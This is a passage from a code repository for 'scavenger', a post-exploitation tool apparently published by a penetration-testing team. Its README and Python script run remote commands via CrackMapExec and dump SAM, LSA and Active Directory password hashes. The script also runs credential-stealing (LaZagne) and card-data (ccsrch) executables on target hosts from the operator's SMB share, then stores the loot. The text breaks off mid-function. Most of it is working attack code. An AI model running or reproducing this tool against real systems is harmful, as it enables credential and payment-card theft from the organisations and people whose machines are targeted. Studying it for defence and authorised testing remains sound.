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But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # scavenger 2 | scavenger : is a multi-threaded post-exploitation scanning tool for scavenging systems, finding most frequently used files and folders as well as "interesting" files containing sensitive information. 3 | 4 | ## Problem Definition: 5 | Scavenger confronts a challenging issue typically faced by Penetration Testing consultants during internal penetration tests; the issue of having too much access to too many systems with limited days for testing. 6 | 7 | ### Requirements: 8 | 9 | * Install CrackMapExec - 10 | [CrackMapExec Installation Page](https://github.com/byt3bl33d3r/CrackMapExec/wiki/Installation) 11 | 12 | ### Examples: 13 | 14 | ``` 15 | $ python3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local 16 | ``` 17 | 18 | ``` 19 | $ python3 ./scavenger.py smb --target iplist --username administrator --password Password123 --domain test.local --overwrite 20 | ``` 21 | 22 | ## Blog Post: 23 | 24 | [Link to Trustwave SpiderLabs Blog](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/scavenger-post-exploitation-tool-for-collecting-vital-data/) 25 | 26 | ## Acknowledgements - Powered and Inspired by: 27 | 28 | * [Impacket](https://github.com/CoreSecurity/impacket) (@agsolino) 29 | * [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) (@byt3bl33d3r) 30 | * [ccsrch](https://github.com/adamcaudill/ccsrch) (@adamcaudill) 31 | * [LaZagne](https://github.com/AlessandroZ/LaZagne) 32 | 33 | ## Notice: 34 | 35 | The "ssh" capability of scavenger has not been uploaded to GitHub yet, there is a change I have to make, and in the interest of not delaying to upload as a whole, I have decided to remove the ssh functionality for the moment. 36 | 37 | The "ssh" capability will be re-added soon. 38 | 39 | Thank you for your patience 40 | 41 | ./haxrbyte -------------------------------------------------------------------------------- /scavenger.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Copyright (C) 2018 Philip (haxrbyte) Pieterse 4 | # 5 | # This program is free software; you can redistribute it and/or modify it under 6 | # the terms of the GNU General Public License version 2, as published by the 7 | # Free Software Foundation 8 | # 9 | # This program is distributed in the hope that it will be useful, but WITHOUT 10 | # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS 11 | # FOR A PARTICULAR PURPOSE. See the GNU General Public License for more 12 | # details (http://www.gnu.org/licenses/gpl.txt). 13 | 14 | __author__ = 'Philip (haxrbyte) Pieterse' 15 | __email__ = 'ppieterse@trustwave.com' 16 | __git__ = 'https://github.com/SpiderLabs/scavenger.git' 17 | __twitter__ = 'http://twitter.com/haxrbyte' 18 | __version__ = 'v1.0' 19 | __license__ = 'GPLv3.0' 20 | 21 | from os import setsid, geteuid, killpg, path, mkdir, chdir 22 | from sys import argv, exit 23 | from argparse import ArgumentParser, RawDescriptionHelpFormatter, FileType 24 | from os import path 25 | from ipaddress import ip_network, ip_address 26 | from queue import Queue 27 | from time import time, strptime, strftime, sleep 28 | from threading import Thread 29 | from subprocess import Popen, PIPE, CalledProcessError, TimeoutExpired 30 | from re import search, sub, finditer, S, compile 31 | from sqlite3 import connect, Row 32 | from signal import SIGTERM, signal, SIGINT 33 | from socket import socket, AF_INET, SOCK_DGRAM 34 | from pathlib import Path, PosixPath, PurePosixPath, PureWindowsPath, WindowsPath 35 | 36 | def test_smb_server(): 37 | smb_server_test = False 38 | process_test = command_execute("smbclient //10.0.0.100/scav/ % -c ls -q") 39 | if len(process_test) > 0: 40 | smb_server_test = True 41 | return smb_server_test 42 | 43 | def smb_server(): 44 | command_execute("""kill $(ps aux | grep '[s]mbserver.py' | awk '{print $2}')""") 45 | process = Popen("""python2 /usr/local/bin/smbserver.py -comment 'scavenger' scav server/""", stdout=PIPE,stderr=PIPE, shell=True, preexec_fn=setsid) 46 | 47 | global PID 48 | PID = process.pid 49 | 50 | return 51 | 52 | def print_debug(uniq_string, var): 53 | print(f"DEBUG {uniq_string}: {var}") 54 | 55 | def feed_database(ip, sysinfo): 56 | db = connect("results/scavenger-cache.dscav") 57 | db.isolation_level = None 58 | db.text_factory = str 59 | con_db = db.cursor() 60 | 61 | print(f"AWESOME: {ip}{sysinfo}") 62 | 63 | with db: 64 | for line in sysinfo: 65 | print(f"DEBUG: {line}") 66 | with db: 67 | sql_command = ( 68 | f"INSERT INTO '{ip}_info_smb_latest' VALUES (" 69 | f":ip_address, " 70 | f":runas, " 71 | f":host_name, " 72 | f":os_name, " 73 | f":win_dir, " 74 | f":sys_dir, " 75 | f":domain_name, " 76 | f":nr_net) " 77 | ) 78 | con_db.execute(sql_command, {'ip_address': sysinfo[0], 79 | 'runas': sysinfo[1], 80 | 'host_name': sysinfo[2], 81 | 'os_name': sysinfo[3], 82 | 'win_dir': sysinfo[4], 83 | 'sys_dir': sysinfo[5], 84 | 'domain_name': sysinfo[6], 85 | 'nr_net': sysinfo[7]}) 86 | 87 | 88 | def create_database(test_type, service): 89 | db = connect("results/scavenger-cache.dscav") 90 | db.isolation_level = None 91 | db.text_factory = str 92 | con_db = db.cursor() 93 | 94 | if test_type == 'info': 95 | sql_command = f""" 96 | CREATE TABLE '{test_type}_{service}_latest' ( 97 | ip_address text NOT NULL, 98 | dc_c integer NOT NULL, 99 | mh_c integer NOT NULL, 100 | sh_c integer NOT NULL, 101 | lh_c integer NOT NULL, 102 | nh_c integer NOT NULL, 103 | cc_c integer NOT NULL, 104 | t2_c integer NOT NULL, 105 | laz_b_c integer NOT NULL, 106 | laz_s_c integer NOT NULL, 107 | runas text NOT NULL, 108 | host_name text NOT NULL, 109 | os_name text NOT NULL, 110 | win_dir text NOT NULL, 111 | sys_dir text NOT NULL, 112 | domain_name text NOT NULL, 113 | nr_net integer NOT NULL) 114 | """ 115 | 116 | elif test_type == 'time': 117 | sql_command = f""" 118 | CREATE TABLE '{test_type}_{service}_latest' ( 119 | ip_address text NOT NULL, 120 | folder_name text NOT NULL, 121 | folder_date text NOT NULL) 122 | """ 123 | 124 | elif test_type == 'credit': 125 | sql_command = f""" 126 | CREATE TABLE '{test_type}_{service}_latest' ( 127 | ip_address text NOT NULL, 128 | t2_c integer NOT NULL, 129 | folder_cc text NOT NULL) 130 | """ 131 | 132 | elif test_type == 'laz_b': 133 | sql_command = f""" 134 | CREATE TABLE '{test_type}_{service}_latest' ( 135 | ip_address text NOT NULL, 136 | laz_browsers text NOT NULL) 137 | """ 138 | elif test_type == 'laz_s': 139 | sql_command = f""" 140 | CREATE TABLE '{test_type}_{service}_latest' ( 141 | ip_address text NOT NULL, 142 | laz_sysadmin text NOT NULL) 143 | """ 144 | 145 | elif test_type == 'hashes_sam': 146 | sql_command = f""" 147 | CREATE TABLE '{test_type}_{service}_latest' ( 148 | ip_address text NOT NULL, 149 | sam_hashes text NOT NULL) 150 | """ 151 | 152 | elif test_type == 'hashes_lsa': 153 | sql_command = f""" 154 | CREATE TABLE '{test_type}_{service}_latest' ( 155 | ip_address text NOT NULL, 156 | lsa_hashes text NOT NULL) 157 | """ 158 | 159 | elif test_type == 'hashes_ntds': 160 | sql_command = f""" 161 | CREATE TABLE '{test_type}_{service}_latest' ( 162 | ip_address text NOT NULL, 163 | ntds_hashes text NOT NULL) 164 | """ 165 | 166 | 167 | with db: 168 | con_db.execute(sql_command) 169 | 170 | 171 | def smb_hosts(ip): 172 | 173 | hostname = crackmapexec_command_exec(ip, '-x hostname') 174 | host = str(hostname[-1].upper()) 175 | 176 | sysinfo = [] 177 | sysinfo_display = [] 178 | folder_list = [] 179 | dc = False 180 | mh = False 181 | cc = False 182 | t2 = False 183 | sh = False 184 | lh = False 185 | nh = False 186 | lz_b = False 187 | lz_s = False 188 | hostname_result = None 189 | 190 | who = (crackmapexec_command_exec(ip, "-x 'whoami'")) 191 | if who: 192 | sysinfo_display.append(f"Running as user : {who[-1]}") 193 | sysinfo.append(who[-1]) 194 | 195 | domain_control = (crackmapexec_command_exec(ip, "-x 'dsquery server'")) 196 | 197 | output = (crackmapexec_command_exec(ip, "-x 'systeminfo'")) 198 | for line in output: 199 | 200 | # print(line) 201 | hostname_match = search(r'^Host\sName:\s+(.+)$', line) 202 | domain_match = search(r'^Domain:\s+([\w\d.-]+)$', line) 203 | os_match = search(r'^OS\sName:\s+([\w()\s\d,]+)$', line) 204 | windir_match = search(r'^Windows\sDirectory:\s+([\w:\\]+)$', line) 205 | sysdir_match = search(r'^System\sDirectory:\s+([\w:\\]+)$', line) 206 | net_match = search(r'Network\sCard\(s\):\s+(\d)([\d\s\w\(\).]+)$', line) 207 | 208 | if hostname_match: 209 | hostname_result = hostname_match.group(1) 210 | sysinfo.append(hostname_match.group(1)) 211 | 212 | elif domain_match: 213 | if '"CN=' in domain_control[-1]: 214 | sysinfo_display.append("Domain : {}".format(domain_match.group(1))) 215 | sysinfo.append(domain_match.group(1)) 216 | dc = True 217 | else: 218 | sysinfo_display.append("Domain : {}".format(domain_match.group(1))) 219 | sysinfo.append(domain_match.group(1)) 220 | 221 | elif os_match: 222 | sysinfo_display.append("Operating System : {}".format(os_match.group(1))) 223 | sysinfo.append(os_match.group(1)) 224 | elif windir_match: 225 | sysinfo.append(windir_match.group(1)) 226 | elif sysdir_match: 227 | sysinfo.append(sysdir_match.group(1)) 228 | elif net_match: 229 | if int(net_match.group(1)) > 1: 230 | sysinfo.append(net_match.group(1)) 231 | 232 | mh = True 233 | else: 234 | sysinfo.append(net_match.group(1)) 235 | 236 | int_folders = ['c:\\users\\administrator\\desktop\\','c:\\docume~1\\administrator\\desktop\\', 237 | 'c:\\users\\administrator\\downloads\\','c:\\windows\system32\\config\\', 238 | 'c:\\windows\\system32\\drivers\etc\\', 'c:\\windows\\repair\\', 239 | 'c:\\windows\\ntds\\', 'c:\\inetpub\\', 'c:\\wmpub\\'] 240 | 241 | for folder in int_folders: 242 | folders = (crackmapexec_command_exec(ip, f"""-x 'forfiles.exe /P {folder} /S /C "cmd /c echo @path @fdate @ftime"'""")) 243 | for line in folders: 244 | folder_match = search(r'^\"(.+)\"\s([\d/]+)\s([\d:]+)\s([AM|PM]+)', line) 245 | if folder_match: 246 | time_12hour = (folder_match.group(2) + ' ' + folder_match.group(3) + ' ' + folder_match.group(4)) 247 | t = strptime(time_12hour, "%m/%d/%Y %I:%M:%S %p") 248 | time_24hour = strftime("%Y-%m-%d,%H:%M", t) 249 | time_24hour_list = time_24hour.split(",") 250 | folder_list.append(f"{folder_match.group(1)},{time_24hour_list[0]},{time_24hour_list[1]}".split(',')) 251 | 252 | sam = (crackmapexec_command_exec(ip, "--sam")) 253 | sam_hashes = [] 254 | 255 | for line in sam: 256 | sam_match = search(r'^.+:\d+:[\d\w]+:[\d\w]+:::', line) 257 | if sam_match: 258 | sam_hashes.append(sam_match.group(0)) 259 | sh = True 260 | 261 | lsa = (crackmapexec_command_exec(ip, "--lsa")) 262 | lsa_secrets = [] 263 | 264 | for line in lsa: 265 | lsa_match = search(r'^[\w\d\\\-\$\_]+:[\w\d:.\-]+', line) 266 | if lsa_match: 267 | lsa_secrets.append(lsa_match.group(0)) 268 | lh = True 269 | 270 | ntds = (crackmapexec_command_exec(ip, "--ntds drsuapi")) 271 | 272 | ntds_hashes = [] 273 | 274 | for line in ntds: 275 | ntds_match = search(r'^.+:\d+:[\d\w]+:[\d\w]+:::', line) 276 | if ntds_match: 277 | ntds_hashes.append(ntds_match.group(0)) 278 | nh = True 279 | 280 | credit_list = [] 281 | t2_display_list = [] 282 | 283 | localip_address = (localip()) 284 | 285 | if test_smb_server(): 286 | 287 | for folder in int_folders: 288 | credit_card = (crackmapexec_command_exec(ip, f"-x '\\\\{localip_address}\\scav\\ccsrch.exe -T {folder}'")) 289 | for line in credit_card: 290 | credit_card_match = search(r'^([a-z]:.+)\s([A-Z_]+)\s+(\d+).*', line) 291 | if credit_card_match: 292 | cc = True 293 | if not 'edb00002.log' in credit_card_match.group(0): 294 | match_t = search(r'TRACK_2', credit_card_match.group(0).strip()) 295 | if match_t: 296 | t2 = True 297 | credit_string = f"{credit_card_match.group(1)} {credit_card_match.group(2)} {credit_card_match.group(3)} ** TRACK2 **" 298 | credit_list.append(credit_string) 299 | else: 300 | credit_string = f"{credit_card_match.group(1)} {credit_card_match.group(2)} {credit_card_match.group(3)}" 301 | credit_list.append(credit_string) 302 | else: 303 | cc = False 304 | 305 | laz_list = ['URL:', 'Login:', 'Password:'] 306 | lazagne_list_browsers = [] 307 | 308 | laz_loop = 0 309 | for laz_loop in range(4): 310 | laz_loop += 1 311 | lazagne_browsers = crackmapexec_command_exec(ip, f"-x '\\\\{localip_address}\\scav\\laZagne_scav.exe browsers'") 312 | finished = False 313 | for line in lazagne_browsers: 314 | if 'passwords' in line: 315 | lazagne_list_browsers.append(line) 316 | elif 'found' in line: 317 | lazagne_list_browsers.append(line) 318 | elif 'URL:' in line: 319 | lazagne_list_browsers.append(line) 320 | elif 'Login:' in line: 321 | lazagne_list_browsers.append(line) 322 | elif 'Password:' in line: 323 | lazagne_list_browsers.append(line) 324 | elif 'Port:' in line: 325 | lazagne_list_browsers.append(line) 326 | elif 'elapsed' in line: 327 | finished = True 328 | 329 | if finished == True: 330 | break 331 | 332 | lazagne_list_sysadmin = [] 333 | 334 | laz_loop2 = 0 335 | for laz_loop2 in range(4): 336 | laz_loop2 += 1 337 | lazagne_sysadmin = crackmapexec_command_exec(ip, f"-x '\\\\{localip_address}\\scav\\laZagne_scav.exe sysadmin'") 338 | finished2 = False 339 | for line in lazagne_sysadmin: 340 | if 'passwords' in line: 341 | lazagne_list_sysadmin.append(line) 342 | elif 'found' in line: 343 | lazagne_list_sysadmin.append(line) 344 | elif 'URL:' in line: 345 | lazagne_list_sysadmin.append(line) 346 | elif 'Login:' in line: 347 | lazagne_list_sysadmin.append(line) 348 | elif 'Password:' in line: 349 | lazagne_list_sysadmin.append(line) 350 | elif 'Port:' in line: 351 | lazagne_list_sysadmin.append(line) 352 | elif 'elapsed' in line: 353 | finished2 = True 354 | 355 | if finished2 == True: 356 | break 357 | else: 358 | print_debug('SMB Server not working') 359 | 360 | screen_output = [] 361 | 362 | if '[+] 0 passwords have been found.' not in lazagne_list_browsers and len(lazagne_list_browsers) > 0: 363 | lz_b = True 364 | else: 365 | lz_b = False 366 | lazagne_list_browsers = [] 367 | if '[+] 0 passwords have been found.' not in lazagne_list_sysadmin and len(lazagne_list_sysadmin) > 0: 368 | lz_s = True 369 | else: 370 | lz_s = False 371 | lazagne_list_sysadmin = [] 372 | 373 | if dc: 374 | screen_output.append("Domain Controller") 375 | if mh: 376 | screen_output.append("Multi Homed") 377 | if cc: 378 | screen_output.append("Card Holder Data") 379 | if t2: 380 | screen_output.append("Track2") 381 | if lz_b or lz_s: 382 | screen_output.append("Other Credentials") 383 | if sh: 384 | screen_output.append("SAM Hashes") 385 | if lh: 386 | screen_output.append("LSA Secrets") 387 | if nh: 388 | screen_output.append("AD Hashes") 389 | 390 | return sysinfo_display, sysinfo, folder_list, sam_hashes, lsa_secrets, ntds_hashes, dc, mh, sh, lh, nh, cc, lz_b, lz_s, credit_list, t2, t2_display_list, lazagne_list_browsers, lazagne_list_sysadmin, screen_output, host 391 | 392 | 393 | def scavenger_process(ip): 394 | output, sysinfo, folder_list, sam_hashes, lsa_hashes, ntds_hashes, dc_check, mh_check, sh_check, lh_check, nh_check, cc_check, lz_b_check, lz_s_check, credit_list, t2_check, tc_display, laz_browsers, laz_sysadmin, screen_output, hostname = smb_hosts(ip) 395 | 396 | printing(ip, f"=== START => {ip} ===", color='gray') 397 | screen_output_str = " * ".join(screen_output) 398 | print(f"\033[94m[+] \033[00m{ip} ({hostname}) => \033[91m{screen_output_str}\033[00m") 399 | for line in output: 400 | print(line) 401 | 402 | if dc_check: 403 | dc_int = 1 404 | else: 405 | dc_int = 0 406 | if mh_check: 407 | mh_int = 1 408 | else: 409 | mh_int = 0 410 | if sh_check: 411 | sh_int = 1 412 | else: 413 | sh_int = 0 414 | if lh_check: 415 | lh_int = 1 416 | else: 417 | lh_int = 0 418 | if nh_check: 419 | nh_int = 1 420 | else: 421 | nh_int = 0 422 | if cc_check: 423 | cc_int = 1 424 | else: 425 | cc_int = 0 426 | if t2_check: 427 | t2_int = 1 428 | else: 429 | t2_int = 0 430 | if lz_b_check: 431 | lz_b_int = 1 432 | else: 433 | lz_b_int = 0 434 | if lz_s_check: 435 | lz_s_int = 1 436 | else: 437 | lz_s_int = 0 438 | 439 | database_input_info = [] 440 | database_input_ntds = [] 441 | database_input_sam = [] 442 | database_input_laz_b = [] 443 | database_input_laz_s = [] 444 | for line in sysinfo: 445 | database_input_info.append(line) 446 | 447 | database_input_time = [] 448 | 449 | laz_browsers_str = " \n ".join(laz_browsers) 450 | laz_sysadmin_str = " \n ".join(laz_sysadmin) 451 | sam_hashes_str = " \n ".join(sam_hashes) 452 | 453 | for line in laz_browsers: 454 | database_input_laz_b.append(line) 455 | for line in laz_sysadmin: 456 | database_input_laz_s.append(line) 457 | for line in sam_hashes: 458 | database_input_sam.append(line) 459 | ntds_hashes_str = " \n ".join(ntds_hashes) 460 | for line in ntds_hashes: 461 | database_input_ntds.append(line) 462 | 463 | db = connect("results/scavenger-cache.dscav") 464 | db.isolation_level = None 465 | db.text_factory = str 466 | con_db = db.cursor() 467 | 468 | if len(database_input_info) > 0: 469 | with db: 470 | sql_command = ( 471 | f"INSERT INTO 'info_smb_latest' VALUES (" 472 | f":ip_address, " 473 | f":dc_c, " 474 | f":mh_c, " 475 | f":sh_c, " 476 | f":lh_c, " 477 | f":nh_c, " 478 | f":cc_c, " 479 | f":t2_c, " 480 | f":laz_b_c, " 481 | f":laz_s_c, " 482 | f":runas, " 483 | f":host_name, " 484 | f":os_name, " 485 | f":win_dir, " 486 | f":sys_dir, " 487 | f":domain_name, " 488 | f":nr_net) " 489 | ) 490 | con_db.execute(sql_command, {'ip_address': ip, 491 | 'dc_c': dc_int, 492 | 'mh_c': mh_int, 493 | 'sh_c': sh_int, 494 | 'lh_c': lh_int, 495 | 'nh_c': nh_int, 496 | 'cc_c': cc_int, 497 | 't2_c': t2_int, 498 | 'laz_b_c': lz_b_int, 499 | 'laz_s_c': lz_s_int, 500 | 'runas': database_input_info[0], 501 | 'host_name': database_input_info[1], 502 | 'os_name': database_input_info[2], 503 | 'win_dir': database_input_info[3], 504 | 'sys_dir': database_input_info[4], 505 | 'domain_name': database_input_info[5], 506 | 'nr_net': database_input_info[6]}) 507 | 508 | if len(folder_list) > 0: 509 | 510 | for line in folder_list: 511 | with db: 512 | sql_command = ( 513 | f"INSERT INTO 'time_smb_latest' VALUES (" 514 | f":ip_address, " 515 | f":folder_name, " 516 | f":folder_date) " 517 | ) 518 | con_db.execute(sql_command, {'ip_address': ip, 519 | 'folder_name': line[0], 520 | 'folder_date': f"{line[1]} {line[2]}"}) 521 | 522 | if len(credit_list) > 0: 523 | for line in credit_list: 524 | if 'edb00002.log' not in line: 525 | with db: 526 | sql_command = ( 527 | f"INSERT INTO 'credit_smb_latest' VALUES (" 528 | f":ip_address, " 529 | f":t2_c, " 530 | f":folder_cc) " 531 | ) 532 | con_db.execute(sql_command, {'ip_address': ip, 533 | 't2_c': t2_int, 534 | 'folder_cc': line}) 535 | 536 | if len(laz_browsers) > 0: 537 | for line in laz_browsers: 538 | with db: 539 | sql_command = ( 540 | f"INSERT INTO 'laz_b_smb_latest' VALUES (" 541 | f":ip_address, " 542 | f":laz_browsers) " 543 | ) 544 | con_db.execute(sql_command, {'ip_address': ip, 545 | 'laz_browsers': line}) 546 | 547 | 548 | if len(laz_sysadmin) > 0: 549 | for line in laz_sysadmin: 550 | with db: 551 | sql_command = ( 552 | f"INSERT INTO 'laz_s_smb_latest' VALUES (" 553 | f":ip_address, " 554 | f":laz_sysadmin) " 555 | ) 556 | con_db.execute(sql_command, {'ip_address': ip, 557 | 'laz_sysadmin': line}) 558 | 559 | 560 | if len(sam_hashes) > 0: 561 | for line in sam_hashes: 562 | with db: 563 | sql_command = ( 564 | f"INSERT INTO 'hashes_sam_smb_latest' VALUES (" 565 | f":ip_address, " 566 | f":sam_hashes) " 567 | ) 568 | con_db.execute(sql_command, {'ip_address': ip, 569 | 'sam_hashes': line}) 570 | 571 | if len(lsa_hashes) > 0: 572 | for line in lsa_hashes: 573 | with db: 574 | sql_command = ( 575 | f"INSERT INTO 'hashes_lsa_smb_latest' VALUES (" 576 | f":ip_address, " 577 | f":lsa_hashes) " 578 | ) 579 | con_db.execute(sql_command, {'ip_address': ip, 580 | 'lsa_hashes': line}) 581 | 582 | if len(ntds_hashes) > 0: 583 | for line in ntds_hashes: 584 | with db: 585 | sql_command = ( 586 | f"INSERT INTO 'hashes_ntds_smb_latest' VALUES (" 587 | f":ip_address, " 588 | f":ntds_hashes) " 589 | ) 590 | con_db.execute(sql_command, {'ip_address': ip, 591 | 'ntds_hashes': line}) 592 | 593 | printing(ip, f"=== END => {ip} ===\n", color='gray') 594 | 595 | return 596 | 597 | def crackmapexec_command_exec(ip, command): 598 | return_value = [] 599 | output = command_execute(f"""crackmapexec {ip} -u {username_g} -p {password_g} -d {domain_g} {command}""") 600 | for line in output.splitlines(): 601 | line2 = sub(r'\x1b\[[0-9;]*m', '', line) 602 | for m in finditer(r'^CME\s+\d+.\d+.\d+.\d+:\d+\s[\w_-]+\s+(.+)', line2, S): 603 | return_value.append(m.group(1)) 604 | return return_value 605 | 606 | 607 | def command_execute(command): 608 | try: 609 | process = Popen(command, stdout=PIPE, stderr=PIPE, bufsize=65536, shell=True, universal_newlines=True) 610 | output = process.communicate()[0] 611 | except CalledProcessError as e: 612 | print("Command Error:") 613 | print(e.output) 614 | return output 615 | 616 | def printing(ip, text, **kwargs): 617 | color = kwargs.get('color', None) 618 | if not color: 619 | print(text) 620 | elif color == 'red': 621 | print("\033[91m{}\033[00m".format(text)) 622 | elif color == 'yellow': 623 | print("\033[93m {}\033[00m".format(text)) 624 | elif color == 'gray': 625 | print("\033[97m{}\033[00m".format(text)) 626 | elif color == 'blue': 627 | print("\033[94m{}\033[00m".format(text)) 628 | elif color == 'info': 629 | print("\033[94m[*] \033[00m{}".format(text)) 630 | elif color == 'warn': 631 | print("\033[91m[*] \033[00m{}".format(text)) 632 | elif color == 'test': 633 | print("\033[97m[*] {} - \033[00m{}".format(ip, text)) 634 | 635 | def multithread_maker(scav_q): 636 | while True: 637 | worker = scav_q.get() 638 | scavenger_process(worker) 639 | scav_q.task_done() # empty queue 640 | return 641 | 642 | #handles Crtl+C 643 | def signal_handler(signal, frame): 644 | print("\n\033[97mCtrl+C\033[00m pressed.. aborting...") 645 | exit() 646 | 647 | def localip(): 648 | s = socket(AF_INET, SOCK_DGRAM) 649 | s.connect(("8.8.8.8", 80)) 650 | #print_debug(s.getsockname()[0]) 651 | localip_address = s.getsockname()[0] 652 | s.close() 653 | return localip_address 654 | 655 | def main(): 656 | if geteuid() is not 0: 657 | print("Run me as r00t!") 658 | exit(1) 659 | 660 | script_path = path.dirname(path.abspath(__file__)) 661 | 662 | if not path.exists("results"): 663 | mkdir("results") 664 | if not path.exists("downloads"): 665 | mkdir("downloads") 666 | 667 | banner = (""" 668 | \033[1;37;40m***************************************************\033[00m 669 | \033[1;37;40m*\033[1;33;40m ___ ___ __ ___ _____ _ __ __ _ ___ _ __ \033[1;37;40m*\033[00m 670 | \033[1;37;40m*\033[1;33;40m / __|/ __/ _` \ \ / / _ \ '_ \ / _` |/ _ \ '__| \033[1;37;40m*\033[00m 671 | \033[1;37;40m*\033[1;33;40m \__ \ (_| (_| |\ V / __/ | | | (_| | __/ | \033[1;37;40m*\033[00m 672 | \033[1;37;40m*\033[1;33;40m |___/\___\__,_| \_/ \___|_| |_|\__, |\___|_| \033[1;37;40m*\033[00m 673 | \033[1;37;40m*\033[1;33;40m |___/ \033[1;37;40m*\033[00m 674 | \033[1;37;40m***************************************************\033[00m 675 | """) 676 | 677 | description = ( 678 | f"scavenger.py v1.0 by Philip Pieterse (@haxrbyte) [https://github.com/SpiderLabs/scavenger]\n" 679 | f"{banner}\n" 680 | f"scavenger => definition [noun]: a person who searches for and collects discarded items.\n\n" 681 | f" *** Powered and Inspired by ***\n\n" 682 | f"Impacket https://github.com/CoreSecurity/impacket (@agsolino)\n" 683 | f"CrackMapExec https://github.com/byt3bl33d3r/CrackMapExec (@byt3bl33d3r)\n" 684 | f"ccsrch https://github.com/adamcaudill/ccsrch (@adamcaudill)\n" 685 | f"LaZagne https://github.com/AlessandroZ/LaZagne\n" 686 | ) 687 | 688 | example = ( 689 | f"examples:\n" 690 | f"$ python3 {argv[0]} smb -t 10.0.0.10 -u administrator -p Password123 -d test.local\n" 691 | f"$ python3 {argv[0]} smb -t iplist -u administrator -p Password123 -d test.local\n" 692 | f"$ python3 {argv[0]} smb --target iplist --username administrator --password Password123 --domain test.local --overwrite\n" 693 | ) 694 | 695 | argument_parser = ArgumentParser(prog='scavenger.py', formatter_class=RawDescriptionHelpFormatter, description=description, epilog=example) 696 | 697 | argument_parser.add_argument("module", choices=['smb', 'test'], help="module: (SMB) or (SSH)") 698 | 699 | parser_group1 = argument_parser.add_argument_group("main arguments") 700 | parser_exclusive_group = parser_group1.add_mutually_exclusive_group(required=True) 701 | parser_exclusive_group.add_argument("-t", "--target", metavar="[target]", dest='target', type=str,help="IP address, CIDR Address Range (format example: 10.10.10.0/24) or a file with a list of IP addresses") 702 | parser_group1.add_argument("-u", "--username", metavar="[user]", dest='username', default='test', type=str,help="username of target") 703 | parser_group1.add_argument("-p", "--password", metavar="[pass]", dest='password', default='test', type=str,help="password of target") 704 | parser_group1.add_argument("-d", "--domain", metavar="[domain]", dest='domain', default="WORKGROUP", type=str,help="domain name (default : WORKGROUP)") 705 | parser_group1.add_argument("-o", "--overwrite", dest='overwrite', action='store_true',help="argument is used \033[91m!!!WARNING!!!\033[00m - lastest scavenger cache data overwrite previous scavenger cache data.") 706 | 707 | if len(argv) is 1: 708 | argument_parser.print_help() 709 | exit(1) 710 | 711 | args = argument_parser.parse_args() 712 | 713 | iplist = [] 714 | 715 | if path.exists(args.target): 716 | with open(args.target, 'r') as target_file: 717 | for target in target_file: 718 | iplist.append(target.strip()) 719 | 720 | elif '/' in args.target: 721 | net4 = ip_network(args.target, strict=False) 722 | for i in net4: 723 | iplist.append(str(i)) 724 | 725 | elif ip_address(args.target): 726 | iplist.append(str(args.target)) 727 | 728 | else: 729 | print("Wrong IP address range format - Please use this format x.x.x.x/24") 730 | exit(1) 731 | 732 | global username_g 733 | username_g = args.username 734 | global password_g 735 | password_g = args.password 736 | global domain_g 737 | domain_g = args.domain 738 | 739 | # if args.module == 'test': 740 | # for a in range(len(iplist)): 741 | # test = crackmapexec_command_exec(iplist[a], '-x hostname') 742 | # print_debug("Test ", test) 743 | # print("*** TEST DONE ***") 744 | # exit(0) 745 | 746 | iplist_up = [] 747 | 748 | for a in range(len(iplist)): 749 | test = crackmapexec_command_exec(iplist[a], '-x hostname') 750 | if not len(test) == 0: 751 | iplist_up.append(iplist[a]) 752 | 753 | scav_queue = Queue() 754 | 755 | print(f"\nscavenger.py v1.0 by Philip Pieterse (@haxrbyte) [https://github.com/SpiderLabs/scavenger]") 756 | print(f"{banner}") 757 | 758 | printing('10.0.0.100', f"*** SCAVENGING STARTED ***\n", color='gray') 759 | 760 | compare = False 761 | previous_scav = False 762 | previous_scav_time = False 763 | detect = [] 764 | 765 | if not path.isfile("results/scavenger-cache.dscav"): 766 | # print("DEBUG: FILE NOT EXIST: scavenger-cache.dscav") 767 | 768 | create_database('info', 'smb') 769 | create_database('time', 'smb') 770 | create_database('credit', 'smb') 771 | create_database('laz_b', 'smb') 772 | create_database('laz_s', 'smb') 773 | create_database('hashes_sam', 'smb') 774 | create_database('hashes_lsa', 'smb') 775 | create_database('hashes_ntds', 'smb') 776 | 777 | elif path.isfile("results/scavenger-cache.dscav"): 778 | detect.append("\033[94m[+]\033[00m Previous scavenger cached data found ...\n") 779 | db = connect("results/scavenger-cache.dscav") 780 | db.isolation_level = None 781 | db.text_factory = str 782 | con_db = db.cursor() 783 | 784 | types = ['info', 'time', 'credit', 'laz_b', 'laz_s', 'hashes_sam', 'hashes_lsa', 'hashes_ntds'] 785 | 786 | for t in types: 787 | if not args.overwrite: 788 | with db: 789 | table_check2 = con_db.execute(f"""SELECT name FROM sqlite_master WHERE type='table' AND name='{t}_smb_previous'""").fetchall() 790 | table_check2_result = [item[0] for item in table_check2] 791 | if f'{t}_smb_previous' in table_check2_result: 792 | previous_scav = True 793 | if f'time_smb_previous' in table_check2_result: 794 | compare = True 795 | con_db.execute(f"""DROP TABLE IF EXISTS '{t}_smb_latest'""") 796 | create_database(f'{t}', 'smb') 797 | else: 798 | con_db.execute(f"""ALTER TABLE '{t}_smb_latest' RENAME TO '{t}_smb_previous'""") 799 | con_db.execute(f"""DROP TABLE IF EXISTS '{t}_smb_latest'""") 800 | create_database(f'{t}', 'smb') 801 | 802 | elif args.overwrite: 803 | with db: 804 | table_check2 = con_db.execute(f"""SELECT name FROM sqlite_master WHERE type='table' AND name='{t}_smb_previous'""").fetchall() 805 | table_check2_result = [item[0] for item in table_check2] 806 | if f'{t}_smb_previous' in table_check2_result: 807 | previous_scav = True 808 | if f'time_smb_previous' in table_check2_result: 809 | compare = True 810 | con_db.execute(f"""DROP TABLE IF EXISTS '{t}_smb_previous'""") 811 | con_db.execute(f"""ALTER TABLE '{t}_smb_latest' RENAME TO '{t}_smb_previous'""") 812 | con_db.execute(f"""DROP TABLE IF EXISTS '{t}_smb_latest'""") 813 | create_database(f'{t}', 'smb') 814 | else: 815 | con_db.execute(f"""ALTER TABLE '{t}_smb_latest' RENAME TO '{t}_smb_previous'""") 816 | con_db.execute(f"""DROP TABLE IF EXISTS '{t}_smb_latest'""") 817 | create_database(f'{t}', 'smb') 818 | 819 | if 